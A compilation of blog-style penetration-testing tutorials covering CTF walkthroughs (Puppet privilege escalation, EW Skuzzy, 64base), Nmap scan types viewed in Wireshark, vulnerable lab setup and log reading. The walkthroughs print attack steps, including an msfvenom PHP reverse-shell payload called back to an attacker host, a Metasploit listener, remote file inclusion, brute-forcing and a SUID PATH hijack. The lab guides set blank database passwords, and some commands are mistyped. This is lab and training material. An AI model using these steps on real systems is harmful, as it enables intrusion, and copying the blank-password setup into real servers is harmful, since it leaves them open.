Sessions 3

Portfwd add -l 8000 -p 22 -r 192.168.122.2

Now login into SSH server through localhost with forwarded port

Ssh localhost -p 8000

From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.

After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.

Now with this password we connect to sandieshaw through ssh.

After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.

Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.

Then we go into the files folder we found two files one in c language and another an executable file. Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.

The puppet file should execute this as root user and we will get the root shell to server.

We then come back to the meterpreter shell and upload it to the current user eric.

After upload it into the system we compile it and send it to the sandieshaw using ssh.

scp spin sandieshaw@192.168.122.2:/home/sandieshaw

Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.

The spin is replaced, now we have to wait for the puppet file to replace the spin file in /tmp/ with our spin file.

After waiting some time we execute the spin file present in /tmp/ folder.

Now we have the root shell, moving into the /root/protovision folder we found a flag that is in hexadecimal format.

After converting it we found a base64 encoded inverse string.

After reversing the string and decoding it we found that it was a link to a youtube video.

Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:

find . -type d

We found that it goes all the way to .z, we move to this location to see its content.

We found two files one in gpg encryption and another readable file then we decode this file using command:

gpg nleeson_key.gpg

This will ask a passphrase, the password is secret which is hinted in the video.

Opening the file we found that it was a private key. So we removed the permissions of the file using:

chmod 600 nleeson_key

Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.

Now we try to connect to it using the private key we found.

After guessing a few users we found that nleesonwas the user for the system.

using the key will ask for a passphrase and the password is joshua.

We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.

So we added a new user ignite to this file by opening this file in vim.

Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.

Then we add our user to sudoers to gain root access.

Then we give our new user permissions same as root.

Then we connect to 192.168.122.3 through ssh and using the username and password we just created.

Now we have to wait some time for the puppet server to update the sudoers, so that our user can have root access.

Then we go to root shell using sudo su.

We move into the root folder and find an image file me.jpeg.

We then copy the image file to eric using ssh.

scp me.jpeg eric@192.168.1.119:/home/eric/

Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.

meterpreter > cd eric/

meterpreter > download me.jpeg /root/Desktop/

We used to exiftool on this file and found nothing so we performed steganography using steghide.

First we check if there is any file hidden behind this image using command:

steghide --info me.jpeg

The passphrase to this file is reticulatingsplines, I found it after various attempts.

Performing steganography we found a file hidden text file.

We extract the text file using steghide, we use the following command:

steghide extract -sf me.jpeg

It will again ask for an password i.e. reticulatingsplines.

After extracting the file we found that it is encrypted in hexadecimal format.

After converting the file from hexadecimal we found that the text was again encrypted in base64 format.

The text contains recurring gACI phrasethat doesn’t allow it to be converted from base64 format.

After removing it we found that the text was inversed after reversing and decoding it we got the final flag.

In this article you will learn how to capture network packet using Wireshark when attacker is scanning target using NMAP port scanning method. Here you will notice that how Wireshark captured different network traffic packet for open and close ports.

Lets start!!!
TCP SCAN
Tcp scan will scan for TCP port like port 22, 21, 23, 445 etc and ensure for listening port (open) through 3-way handshake connection between source and destination port. If port is open then source made request with SYN packet, as response destination sent SYN, ACK packet and then source sent ACK packets, at last source again sent RST, ACK packets.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sT -p 445 192.168.1.102
From given image you can observe the result that port 445 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark.
You will notice that it has captured same sequence of flag as described above:

Source sent SYN packet to destination
Destination sent SYN, ACK to source
Source sent ACK packet to destination
Source again sent RST, ACK to destination.

Let’s figure out network traffic for close port. According to given image it is showing if scanning port is closed then 3-way handshake connection would be not possible between source and destination.
Source sent SYN pack and if port is close the receiver will sent response through RST, ACK.

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.
nmap -sT -p 3389 192.168.1.102
From given image you can observe the result that port 3389 is closed.

Look over the sequence of packet transfer between source and destination captured through wireshark.
You will notice that it has captured same sequence of flag as described above:

Source sent SYN packet to destination
Destination sent RST, ACK packet to source

Stealth Scan
SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively typical and stealthy since it never completes TCP connections.
The port is also considered open if a SYN packet (without the ACK flag) is received in response.
This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN, ACK indicates the port is listening (open)

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sS-p 22 192.168.1.102
From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent SYN packets to destination
Destination sent SYN, ACK packets to source
Source sent RST packets to destination

Now figure out traffic for close port using stealth scan. When source sent SYN packet on specific port then if port is closed then destination will reply by sending RST packet.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sS -p 3389 192.168.1.102
From given image you can observe the result that port 3389 is closed.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent SYN packets to destination
Destination sent RST, ACK packets to destination

Fin Scan
A FIN packet is used to terminate the TCP connection between source and destination port typically after the data transfer is complete. In the place of a SYN packet, Nmap start a FIN scan by using a FIN packet. If port is open then no response will come from destination port when FIN packet is sent through source port.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sF -p 22 192.168.1.102From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent FIN packets to destination
Destination sent no reply to source

Similarly if Fin scan is performed against any close then source port will sent FIN packet to specific port and destination will reply by sending RST, ACK packets.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sF -p 3389 192.168.1.102
From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent SYN packets to destination
Destination sent RST packets to destination

Null Scan
A Null Scan is a series of TCP packets which hold a sequence number of “zeros” (0000000) and since there are none flags set, the destination will not know how to reply the request. It will discard the packet and no reply will be sent, which indicate that port is open.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sN -p 22 192.168.1.102
From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent Null packets to destination
Destination sent no reply to source

If the port is closed, the Destination will send an RST, ACK packet in response when source send null packets on specific port.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sN -p 3389 192.168.1.102
From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent Null (none) packets to destination
Destination sent RST, ACK to source

UDP Scan
UDP scan works by sending a UDP packet to every destination port; it is a connection less protocol. For some common ports such as 53 and 161, a protocol-specific payload is sent to increase response rate, a service will respond with a UDP packet, proving that it is open. If no response is received after retransmissions, the port is classified as open|filtered. This means that the port could be open, or perhaps packet filters are blocking the communication.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sU -p 161 192.168.1.119
From given image you can observe the result that port 161 is open.

Look over the sequence of packet transfer between source and destination captured through Wireshark

Source sent UDP packets to destination
Destination sent UDP packet with some data to the source

Similarly if source sent UDP packet on a close port to the destination then destination sent reply with ICMP packet port unreachable with appropriate error

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.

nmap -sU -p 53 192.168.1.119
From given image you can observe the result that port 53 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent UDP packets to destination
Destination sent ICMP packet port unreachable to the source

Xmas Scan
These scans are designed to manipulate the PSH, URG and FIN flags of the TCP header, Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. When source sent FIN, PUSH, and URG packet to specific port and if port is open then destination will discard the packets and will not sent any reply to source.

Type following NMAP command for TCP scan as well as start wireshark on other hand to capture the sent Packet.

nmap -sX -p 22 192.168.1.102
From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent FIN,PUSH and URG packets to destination
Destination sent no reply to source

Similarly if source sent FIN, PUSH and URG packets to specific port and if port is closed then destination will sent RST, ACK packets to source.

Type following NMAP command for TCP scan as well as start Wireshark on other hand to capture the sent Packet.

nmap -sX -p 3389 192.168.1.102
From given image you can observe the result that port 3389 is close.

Look over the sequence of packet transfer between source and destination captured through wireshark

Source sent FIN,PUSH and URG packets to destination
Destination RST, ACK packet to source

Hello friends! Today you will learn how to configure your own web server using ubuntu inside virtual machine and install LAMP services for web server configurartion.

Let’s Begin!!

We are using VM worksatation 12 pro for ubuntu installation, now for the guidance step by step.

Choose typical (1^st options)for configuration and click on next.

Since I have already downloaded ubuntu 14.04 of 64 bit in my windows operating system, so let browse it as shown in given image.

Click on next.

Now enter information for personalize Linux inside text filed

Full name: pentestlab

Username: raj

Passwords: 123

Confirm: 123

Then click on next.

Specify disk capacity according to your desire as 20 GB I had specified.

Choose split virtual disk into multiple file and then click on next.

Now make some changes in settingthrough customize hardwarebefore you click on finish.

Change network adapter setting into Bridge and select the check box for replicate physical network connection state.

Then click on close then Finish.

This will create a new virtual machine inside your VM workstation.

Now wait for small period of time till it boot up automatically after then it will start installation which will take some time.

Now your enter the password for login.

Now we need to install LAMP service, which is collection of open source software used to make web servers up and running. The LAMP stands for Linux, Apache, MySQL, and PHP.

For installation user must have root privileges now type following command inside terminal to begin.

sudo bash

apt-get update

Apache HTTP Server is cross-platform, meaning that it is built for Unix-like system.Apache played a key function for the World Wide Web.

Apt-get install apache2

MySQL is the world's most popular open-source database. MySQL is simple to set up and easy to use.

Apt-get install mysql-server

You will get a prompt, Press enter to set password “blank” for root user in mysql configuration

Again press enter

phpMyAdmin is a free software tool written in PHP, proposed to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL.

Apt-get install phpmyadmin

Choose apache2web server that will be automatically configure to run phpmyadmin.

Again a prompt will open for submit the password for phpmyadmin, to register with database server.

Press enter to left password “blank” for phpadmin.

Now in order configure phpmyadmin under Apache, you need to edit “/etc/apache2/apache2.conf” at the end of apache2.conf file. Therefore type following command to open the apache2.conf

cd etc/apache2

gedit apache2.conf

Once the file get opened type following text at the end of file as shown in given image

# phpMyAdmin Configuration

Include /etc/apache2/apache2.conf

After editing save the file.

Since we had given blank space as password for phpmyadmin therefore we need to make some changes inside its file “ configuration.inc.php” so that it could Allow No Password while login into database.

Type following command to open config.inc.php

gedit /etc/phpmyadmin/config.inc.php

Focus on highlighted comment remove double pipe (||) to activate this comment.

Now you can observe the given image is highlighting following comment:

ALLOW NO PASSWORD = TRUE

Now open myphpadmin in browser as localhost/phpmyadmin as shown in image.

Install the PHP 5 module forApache 2 and all of its dependencies.

apt-get install php5 libapache2-mod-php5

Hence we had install LAMP services inside ubuntu therefore it will operate like as web server.

Now install some other useful services for sharing data between server and client.

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. It is a TCP protocol holds port 22 to establish communication between server and client.

Apt-get install openssh-server

Install vsftpd service, it is the default FTP server in the Ubuntu, it is also a tcp protocol hold port 21 for data transfer.

Apt-get install vsftpd

In order to ensure that above service has been installed properly in your system use nmap which will scan your system and then tell open ports and running services on your system.

To run nmap, first install it through following command

Apt-get install nmap

Now scan your system using nmap to make sure for running services.

Nmap 127.0.0.1

From given below image you can check it has dump the result which has disclosed the running service of my system.

Hello friends! Today we are going to take another CTF challenge known as EW skuzzy. The credit for making this vm machine goes to “vortexau” and it is another capture the flag where author has hidden flag for the attacker as a challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.112 as network IP; now using nmap lets find out open ports.

nmap -sV 192.168.1.112

From give image you can check port 22 for SSH, 80 for TCP and 3260 for iscsi are open in target network.

We tried to connect it using ssh but didn’t find any clue, so we opened this IP in browser.

Ok now we spent some time on this site after using dirb and nikto we found some troll flags.

So we move on to the next port 3260 that is running the iscsi, ISCSI stands for Internet Small Computer Systems Interface. It is used for linking data storage facilities in a network.

You can check which targets are available by using the iscsiadm utility. Enter the following in a terminal:

iscsiadm -m discovery -t -st –p 192.168.1.112

Then we connect to the data storage

iscsiadm –m node –login

Now we check if the data storage is available.

fdisk –l

We see that 1 new storage /dev/sdb is available. Now we will mount this storage to access it.

mount /dev/sdb /root/Desktop/raj

After mounting the storage device we move into the storage and check the content of the storage.

We find our 1^st flag, we also found a disk image inside the storage we now mount this disk to check the content of the disk.

Now we move inside the disk storage we found an eml file “Toalice.eml” and an encrypted file “ToAlice.csv.enc”. We open the eml file and find our 2^nd flag.

We also find that that the encrypted file is encrypted in 256-bit encryption through the eml file.

When we decrypt the file we find that it requires a password. So first we Bruteforce the encrypted file to obtain the password.

bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 -c AES-256-CBC Toalice.csv.enc

We now have the password “supercalifragilisticoespialdoso”. We use openssl to decrypt the file.

openssl enc -d -aes256 -md sha256 -salt -in ToAlive.csv.enc -out alive -k supercalifragilisticoespialdoso

We find the 3^rd flag, we also found some random strings. We first tried to decrypt it but they weren’t encrypted in the first place. Then we found that these were actually page name.

We open these in browser, the first page gives us a site that doesn’t contain anything significant just some trolling.

The second page contains some content that looks useful.

After playing around the site we found our hint, we move to feed reader.

We open the load feed link.

Here we found our hint that there is a PHP file hiding something so we use dirb to find all the php files inside this folder.

dirb http://192.168.1.112/c2444910794e037ebd8aaf257178c90b/ -X .php

Now we find all the php files in the folder. When we open these files it gives us another hint. After taking a look at the URL we found that RFI may be possible on this site.

When we use RFI it says it requires an authentication key.

So we move to LFI, we open the PHP files using curl through LFI. We use php filter to bypass the security.

After scrolling down we found a base64 encoded string

After decoding the file we found the 4^th flag.

Now we open the other php files. After going through the files we found the next hint in “reader.php”.

We open the “reader.php” using LFI.

We again find a base64 string inside the file.

After decoding the string we found it was a php code. In the code we found our next hint, it states that the key is 47 characters long. After going through all my notes I found that flag4 was 47 characters long so we used it as the key and it worked.

Now we create a payload using msfvenom and save it as a text file.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 > /root/Desktop/ra.txt

After creating the file we then edit the file, we replace with ##php##.

Then we use RFI to execute the shell on the server to get the meterpreter. Also add the Key at the end of the url.

We then start the listener in metasploit.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.120

set lport 4444

exploit

Using RFI we execute the payload and got the shell

meterpreter > sysinfo

meterpreter > shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Then we find executable files on the system

find / -perm -4000 2>/dev/null

We found the file /opt/alicebackup when we execute the file we found the file contains id command.

So we copy /bin/sh into id

cp /bin/sh id

and export the path to tmp/ folder

export PATH:/tmp/$PATH

then execute the file /opt/alicebackup

Now we when we execute the file, we get the root shell. After getting the root shell we move into the /root/folder and find the final flag.

In our previous article you had learnt how to configure a web server using ubuntu system with the help of LAMP services for designing your own pentest lab. Today you will how to configure the famous 4 web application (DVWA, bWAPP, SQLIand Mutillidae) inside web server for web penetration (WAPT) practices.

Let’s Begin!!

Open the terminal and login with root user and move inside html directory using following command.

sudo bash

cd /var/www/html

Basically to operate all web application on browser through localhost you should download and configure these web application inside html directory only.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications.

Download dvwa inside html using following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip

Now type following command step by step to configure dvwa.

From given image you can see we have downloaded master.zip file, now unzip this file using below command.

unzip master.zip

After unzip, move file and folder of DVWA-master into dvwa

mv DVWA-master dvwa

cd dvwa

After then move inside config in order to rename config.inc.php.dist into config.inc.php

cd config/

mv config.inc.php.dist config.inc.php

gedit config.inc.php

Now open config.inc.php using above command, here you will observe that db_password is p@ssw0rd. But remove the password and left it blank space for db_password.

After leaving blank password save config.inc.php

Now run web application in browser through URL: localhost/dvwa/setup.php

As shown in given image a web page will get open for dvwa setup, now click on given tab Create/ Reset Database.

By default the username and password is admin: password respectively for login into dvwa.

Using above step for installation you can configure dvwa in your web server and perform web penetration testing by exploiting given vulnerabilities.

bWAPP

A buggy web application is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bwapp and then unzip that folder.

wget https://sourceforge.net/projects/bwapp/files/latest/download

cd /var/www/html

Now shift bwapp from download directory to html directory using move command

mv /home/raj/downloads/bwapp_latest/bwapp .

Now you can observe we have bwapp inside html directories.

Now make following changes inside the file “setting.php” for its configuration.

cd admin

gedit setting.php

Here remove the password “bug” for db_password as done above.

Now Leave blank spacefor db_password and then save the file.

Now browse web application through URL: localhost/bwapp/install.php

As shown in image a web page will get open for installation; now click on given link “click hereto install wapp”. After that your bwapp will get successfully install and will ready for penetration testing.

Now use default username and password bee: bug for login into bwapp and start your practice.

SQLI

SQLI labs to test error based, Blind boolean based, Time based.

cd /var/www/html

Download SQLI dhakkan inside html directory and then unzip it.

wget https://github.com/Audi-1/sqli-labs.git

unzip master.zip

Now open web application inside browser using URL: localhost/sqli

Click on “Setup/reset Database for labs”

Copy all file and folder of sqli-labs-master into sqli using following command

mv sqli-labs-master sqli

Now open web application inside browser using URL: localhost/sqli Click on “Setup/reset Database for labs”

This will create database setup for lab and after that it will be ready for SQL penetration testing. This lab is design for mainly sql injection attack each lesson have different sql error.

OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software

Download mutillidae using following command

wget https://sourceforge.net/projects/mutillidae/files/latest/download

cd /var/www/html

Move file and folder of mutillidae from inside download into var/www/html by typing following command

mv /home/raj/Downloads/mutillidae

This web application does not required extra configuration setting you can directly open it inside browser using URL: localhost/mutillidae

Now use your pentesting skill to exploit its vulnerability.

Today we are demonstrating how to install and configure wordpress for penetration testing inside the web server. To configure wordpress, you must install any web host software such as xampp/wamp or read our previous article “Configure Web Server for Penetration Testing (Beginner Guide)” which will help in set up of your own localhost web server. Here we are using our own web server which had configure in ubuntu 14.04.

WordPress is a free and open-source content management system (CMS) based on PHP and MYSQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.

For more detail visit https://en.wikipedia.org/wiki/WordPress

Let’s start!!

If you have read our previous article, then you might be remembering that we had specified blank space as password for root user. Now start with login into phpmyadmin as root user.

phpmyadmin is separated into two parts left and right panels. The left panel contains name of existing databases and right panel contains functional setting for performing maintenance operations on tables, backing up information, editing things and creating or deleting the database.

In order to store wordpress data we need to create a new database. Now click on databases tab given at the top of right panel.

Now enter the name for database system such as wordpressand then click on create. After that you will observe a new database“wordpress” will get add into left panel.

Open the terminal and type following command to download wordpress inside /var/www/html

wget https://wordpress.org/latest.zip /

Now unzip the folder of latest.zip

unzip latest.zip

From given image you can see we have folder of wordpress inside /html directory.

Now for wordpress installations open it on browser through URL: http:// localhost/wordpress as shown in given image. At the end of window click on let’s go to proceed for installation.

At another window enter your database connection information such as:

Database Name: wordpress

Username: root

Password: (null)

Database host: localhost

Now click on submittab.

In next window you will get some code of line to configure wp-config.php file as shown in given image. Now copy the highlighted text into a text document. After you done come back and click on run the install.

As you can see we have pasted above copy text inside a text file and then save it as wp-config.phpon desktop.

Since we have saved wp-config.phpon desktop therefore we are going to shift it inside /var/www/html/wordpress using following command.

mv /home/raj/Desktop/wp-config.php .

After then go back to previous open tab and click on Run the install.

“Welcome” the new window will come up, now fills the information below and you’ll be on the way for wordpress installation.

Site title: Pentest Lab

Username: admin

Password: password

Email: (your email ID)

At last click on “install wordpress” tab given at the end of window.

Once wordpress will successfully install, click on log in as shown in given image.

Now enter your wordpress credential for login.

Great!! Finally our web site “pentest lab” is online on localhost server and is ready posting articles and blogs.

Now we need to add some Plug-in wordpress so that we can make wordpress penetration testing by exploiting these plug-in based vulnerabilities. WordPress' plug-in architecture allows users to extend the features and functionality of a website or blog.

Now type following command to give all permission to the file and folder own by www-data of /var/www/html.

sudo chown –R www-data /var/www/html

For penetration testing practice we are going to download some vulnerable plug-in so that we have our own vulnerable wordpress site.

We had downloaded a vulnerable plug-in “reflex gallery 3.1.3 arbitrary file upload” found from inside the exploit-db.com, you can download many other vulnerable plug-in from exploit database.

Now login into wordpress as admin to access administration control panel and then select plugins option from dashboard and go for new pluginso that you can add your install plug-in in your wordpress.\

Now browse you downloaded zip file and then click on upload plugin for installation.

It will install plug-in into wordpress, now to activate it click on given tab Activate Pluginas shown in given image.

Similarly you can install as much as can be possible vulnerable plug-in into wordpress. You can see we had installed many plug-in inside our wordpress so that we can make more practice on wordpress penetration testing which you will learn in our next upcoming article.

Wait for our next article where you will how exploit wordpress plug-in base vulnerability.

Hello friends! Today we are going to take another CTF challenge known as 64base. The credit for making this vm machine goes to “3mrgnc3” and it is another capture the flag where author has hidden flag for the attacker as a challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.118 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- sV 192.168.1.118

We found that port 80 is open, so let’s open this ip in our browser.

When we take a closer look at the source code, we found a long encoded string comment.

It is hexadecimal encoded, after decoding it we found another base64 encoded string. Decoding the latter string we found our 1^st flag.

Now inside the flag is another base64 string, we decode it and find a username and password.

Now we take a look around the site in the first post we find hint, using cewl we make a dictionary of this page and find that Imperial-Class exist.

Opening the link, it will ask for password and username. We use the username and password that we found earlier to login. When we open this link we find a hint, so we take a look at the source code.

Inside the source code we find another hint for a link.

When we open this link we find a login page. When we look at the source code of the login page we find that when data is submitted a file called login.php is handling the login form. So we take a look at that page.

Here we found a few strings that are encoded in hexadecimal, when we decode them individually we find they are part of a bigger string so we join the strings together and decode it.

The string is in hexadecimal format, when we decode it we find a base64 encoded string. When we decode the base64 string we find our 2^nd flag. Inside the flag is another base64 encoded string, when we decode it we find that it is a link to a youtube video.

From this video we are hinted that we should use burp suite. So we start the burp suite to capture the request of the login page.

After capturing the request we sent it to repeater, here in the response we get the 3^rd flag. Inside the flag we see a base64 encoded string.

After decoding the flag we get a link.

Here we don’t find anything, then we remember the hint what we found on the first page.

So we replace exec with system and try to run our command.

Here we find our 4^th flag and we find that inside the flag contains base64 encoded string. After decoding it we find a username and password now we are going to use it to login into ssh After failing a few times I encoded the password again in base64 format.

Now we are going to login through ssh, we know from our netcat that port 62964 is running openssh.

Now that we are inside the shell, we list the files in the current directory.

We open the file and get a random message, after trying a few commands it is possible that the functions of the commands have been changed. So we check the path of commands

echo $PATH/*

We find that path of the commands have been changed. We see that there is a command called droids, we run it to see what it does.

After running the command we get a matrix screen, when we close it we get this message given in the above image. Earlier we weren’t able to change directory, now after running the command we were able to change directories.

After going through the files we find a hint inside /var/www/html/admin. We find a folder called S3cR37/ we move into this folder and find our 5^thflag.

Inside the flag5 we find a base64 string when we decode it, it gave us a hint.

Now cat command doesn’t work so we use strings command to find the strings inside the file.

We find a hexadecimal encoded string, we copy it into a file on our local system and decode it and find it is an rsa key.

We remove its permission using command:

chmod 600 rsa_key

Then we connect to root using this key

ssh 192.168.1.118 –I rsa_key

When we try to login it ask for a passphrase, after a lot of searching we send the flag5 file to our system for more information.

scp -P 6296464base@172.16.0.19:/var/www/html/admin/S3cR37/flag5* \ > /root/Desktop/flag5.jpeg

Now we open the file on the local system, inside the file we find another hint to use the force.

After trying some passphrases, we found the passphrase is usetheforce

Now when we can login through ssh.

We find the final flag; inside the flag we find a hexadecimal string. When we decode the string we find a base64 string, again when we decode the string we find a hexadecimal string, when we decode the hexadecimal string we again find a base64 string. When we decode it we finally get a message that looks like a command.

When we run this command on the VM, we get a congratulation message that we completed the CTF.

Logs

Log files are a standard tool for computer systems developers and administrators. They record the (W5) "what happened when by whom, where and why happened" of the system. This information can record faults and help their diagnosis.

Log Format

The Common Log Format also known as the NCSA Common log format. Each line in a file stored in the Common Log Format has the following syntax:

[host; ident; authuser; date; request; status; bytes]

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] "GET /apache_pb.gif HTTP/1.0" 200 1068

1. A "-" in a field indicates missing data.

2. 127.0.0.1 is the IP address of the client (remote host) which made the request to the server.

3. User-identifier is the RFC 1413 identity of the client.

4. raj is the user id of the person requesting the document.

5. [30/Aug/2017:10:25:16 -0700] is the date, time, and time zone that the request was received

6. "GET /apache_pb.gif HTTP/1.0" is the request line from the client.

7. 200 is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error, and 5xx a server error.

8. 2326 is the size of the object returned to the client, measured in bytes

Importance of log analysis

Logs play an important role in tracking each client computer's activity and its communication with other computers and networks. Network or system administrator analysis log in order to keep an eye on your network for vulnerabilities that may enter in network to access sensitive information in the form of security attacks. You might be able to identify who introduces risks, and help that person to use better precautions.

Location of log files

Generally in Linux or UNIX system logs are created under /var/logdirectory, here you will find some very important log file such as: apache, auth, mysql, kernel, bootstrap, dmeg, apt and etc.

Some Important Types of Logs

Application log

The Application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.

Apache: /var/log/apache

Samba: /var/log/samba

Mail: /var/log/

Mysql: /var/log/

For Example let’s consider apache log files for analyzing its logs, thereare two types of apache http server log files:

· Apache Access Log File

Apache server records all incoming requests and all requests processed to a log file. Location and content of the access log /var/log/apache/access.log.

· Apache Error Log File

All apache errors information those are found during server requests are logged to this file. Location of error log /var/log/apache/error.log

Now open apache2 log using following command in terminal (UNIX system).

cd apache2

You can see all log files of apache2 as shown in given image.

echo>access.log

Using echo command I had deleted all previous logs from inside access.log file, so that we can read our recent logs for current activity.

As I had described above that apache2 will create logs for client activities on browser. Therefore I had opened some web application like: dvwa, bwapp and wordpress site in respective order and as result in same order log will be created inside apache2.

There are so many command and tools used for log analyzing; among them we had use only three command line utility cat, head and tail for reading logs.

From given image you can see we have used cat command to read log which begins with dvwa’s log and end on wordpress’s log.

Cat is standard UNIX utility use for reading content of file. With help of cat command you can view whole content inside any log file.

Syntax: cat [options] file name

cat access.log

Head is a program on UNIX and Unix-like systems used to display the beginning of a text file.

Syntax: head [options] file name

head access.log

By default, head will print the first 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: head - n 30 file name.

Tail is a program on UNIX and Unix-like systems used to display the tail end of a text file.

Syntax: tail [options] file name

tail access.log

From given image you can perceive that it has shown log for wordpress at the end of file.

Significant way of reading logs

Since tail reads end lines of log file which consist information of recent activity of the client therefore we are going to take help tail’s option for reading log in a significant way.

By default, tail will output the last 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: tail - n 30 file name.

tail -n 2 access.log

From given image you can see above command applied filter and read only two logs from recent records.

If you want to read multiple log files simultaneously then type following command.

tail -n 2 access.log error.log

From given image you can observe that it has shown two-two logs for each i.e. access log and error log.

Now apply filter using grep command with tail command for specific records of log.

Syntax: tail [option] file name | grep “string” [option]

Tail access.log | grep 200

From given image you can notice, it has highlighted log having stringas 200. Generally for a network administrator this command will reduce his/her effort while log analyzing because he/she can directly read those log where client or attacker has got successfully response from server.

When server is not able to give reply of request made by client it response through error 404 “not found”.

tail access.log | grep 404

From given image you can see it has highlighted log string 404 from set of log records.

As you known on browser we had browsed web application dvwa, bwapp and wordpress as respective sequences, therefore we get their log in same sequence dvwa log at top; bwapp log at middle and wordpress log at the end of access.log file

Log files are very large, reading them at ones will not possible for administrator therefore he/she can use after and before option with grep as filter for logs.

Syntax: tail [option] file name | grep -A [number of lines] “string”

tail access.log | grep -A 2 “bwapp”

Here -A stand for after, therefore it will filter 2 logs created after bwapp logs and hence it will indicates 2 logs of wordpress as shown in given image.

Similarly apply filter using before parameter and type following command with specific argument.

tail access.log | grep -B 2 “wordpress”

Here -B stand for before, therefore it will filter 2 logs created before wordpress logs and hence it will indicates 2 logs of bwapp as shown in given image.

Auth Log

Auth.log file holds system authorization information; including user login attempts either successful or failure both type of log records as well as authentication method that were used for establishing connection with server, for example SSH login between server and client

Location:/var/log

Again I had used echo command to remove all previous record from inside auth.log

echo>auth.log

Suppose client uses putty for ssh login into server.

If the client having valid credential for ssh then he will get successfully login into server. From given image you can see I had successfully login into server. Hence inside server auth.log file, it will create a new record for SSH login successful.

While in next image you can read access denied message which means fail in login into SSH server. Hence this time inside auth log again a new record will be create for SSH login failure.

Now let‘s read the whole records of auth log file for above client activities using cat command.

cat auth.log

From given image you can read the logs for successful and failure login.

Vsftpd Log

Vsftd log holds system authentication log for FTP login records either successful or failure.

Location:/var/log

I had deleted all previous logs using echo command and using WinSCP for FTP server login. You can observe that we had login successfully. Hence it will create a new record in vsftpd.log for client login successfully.

Now let’s verify it though vsftpd log file and use cat command for reading whole file. From given image you can observe it has created a record in log file for client 192.168.0.104 is CONNECT.

